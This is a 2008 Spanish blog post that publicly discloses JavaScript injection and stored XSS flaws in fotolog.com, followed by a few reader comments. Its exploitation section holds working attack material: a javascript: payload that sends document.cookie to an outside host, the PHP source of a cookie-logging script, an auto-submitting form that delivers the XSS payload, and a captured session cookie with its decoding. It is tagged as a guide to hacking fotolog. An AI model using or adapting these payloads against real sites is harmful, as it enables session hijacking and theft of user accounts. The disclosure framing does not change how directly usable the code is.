Loading ...Fallos en FOTOLOG.COM
Fallos en FOTOLOG.COM
- Presentación
- Explicación de fallos
- Explotación de fallos
- Despedida
1. Presentación:Hola!
mucho gusto, mi nombre es emiliano soy más conocido en internet por el nick de ” Knet ” y soy programador web orientado a la seguridad de los sistemas informaticos, por medio de este documento les explico y a su vez hago publico varios fallos en el sitio www.fotolog.com.
Les cuento, que los motivos que me llevaron a encontrar dichas fallas fue simplemente la curiosidad y la aplicación de conocimientos sobre el sitio, Aclaro que en ningun momento pense lucrar con dichos fallos o usarlos con algún fin de beneficio personal o algo por el estilo.
Si se los reporto es para que lo reparen de lo contrario, no sere responsable si estas fallas son encontradas por personas mal intencionadas.
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
2. Explicación de fallosFallos a tratar:
- Javascript inyección
- XSS del 2do tipo ( Cross Site Scripting )
Fallo nº1 - Javascript inyección:
En concreto el fallo reside en el filtro de variables, en la seccion Mi Cuenta - Perfil
en la parte infererior.
EJ 1:
EJ 2:
Como ven en el “EJ 2″ en la seccion de la URL podemos añadir código JS, y así optener como resultado
la ejecución de un evento JS en el navegador:
EJ 3:
ALERT con el valor de las COOKIES de session:
Fallo nº2 - XSS del 2do tipo:
este segundo fallo reside en el archivo : http://photo.fotolog.com/email_to_friends y tambien es un problema de filtrado de variables.
EJ 1:
y como poemos ver en este segundo ejemplo
EJ 2:
se logro ejecutar codigo html, poniendo en principio la cadena : </textarea> y al dar error cuando se submite la información, el valor del textarea pasa a ser las lineas enviadas por POST las cuales no son filtradas entonces pasa que se cierra el textarea y se ejecuta el código que la sigue . . .
3. Explotación de fallosla principal más simple y riesgosa forma de explotar este fallo es el robo de sessiones, les voy a demostrar en pasos simples como es posible.
Explotando el fallo nº1 - Javascript inyección
EJ 1:
si alcanzamos a ver en esta imagen, modificamos el código fuente ,elevando el valor del input llamado: link:72316332:url
y agregamos la inyeccion JS.
pasemos a explicar la inyeccion JS:
EJ 2:
javascript:document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie
este evento, lo que va a hacer es que el navegador se redirija a el sitio web :
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(’REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(’Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(’REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(’Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
luego de clickear un usuario el ataquente optiene : cookies.txt
la cookie de session:
cGFpbnRydWxlc3wxfDB8MXwxMjEzMzkwNjM1fDEyMTMzOTA2MzV8MjE5MDY1Mzl8MjkzNmI5ZWIxMDcyMTNiMmJkMTA0NzU4MTQxZWMwZTQ=
desencriptada:
paintrules|1|0|1|1213390635|1213390635|21906539|2936b9eb107213b2bd104758141ec0e4
como ven, se logro robar la session.
Explotando el fallo nº2 - XSS ( Cross Site Scripting )al ser indirecta, la ejecución de código HTML el atacante debe preparar un formulario especialmente modificado que al ser clickeado o incluso puede hacer que se auto envie , provoque la salida de código
de esta manera :
<script>
function enviar()
{
document.formulario.submit();
}
</script>
<body OnLoad=”enviar()”>
<form method=”post” action=”http://photo.fotolog.com/email_to_friends” name=”formulario”>
<input type=”hidden” name=”u” value=”cumbio”>
<input type=”hidden” name=”photo” value=”47041145″>
<input type=”hidden” name=”uploaded” value=”false”>
<input type=”hidden” name=”from” value=”keynet.security@gmail.com”>
<input type=”hidden” name=”to” value=”</textarea><script>document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie</script>”>
<input type=”hidden” name=”message” value=”He visto una foto en la página Fotolog”>
</form>
</body>
entonces al provocar se ejecutara el script, que anteriormente explique lo que hace.
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
Espero que les haya gustado, hayan entendido y sepan valorar mi explicación.
no me responsabilizo del mal uso, y el documento fue confeccionado con el fin de ayudar a la comunidad de FOTOLOG.COM.
reintero mi contacto por [Mail] o [MSN] : Keynet.Security@Gmail.com
Saludos Cordiales.
PD: Disculpen las faltas de ortografia 
Etiquetas: como hackear fotolog, crack, fallos en fotolog, fotolog, hackear, javascript, Javascript inyección, Uncategorized
Artículos relacionados:
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Envía este artículo a un amigo
July 29th, 2008 at 3:17 am
Woow, que bien, que bueno eres jeje
a mi tambien me interesa mucho la seguridad y encontrar bugs en sitios jeje
August 5th, 2008 at 10:43 pm
a mi hija le hackearon el fotolog y esta muy trsite.yo no entiendo de computacion .me ayudas a devolverselo.
fotolog.com/onlytachh
gracias
August 5th, 2008 at 11:01 pm
hola mi problema es que no puedo iniciar sesion queria ver si lo podrias arreglar..gracias..espero tu respuestaah!mi window es 98
August 13th, 2008 at 3:37 pm
flaco te agregue al eme porq no entendi una garcha jaja
August 21st, 2008 at 11:37 am
hola mira no puedo iniciar secion con la pagina de fotolog
yo quiero entrar y me dise q la pagina no se puede mostra
por fabor me solucionan el probleme se los agradesco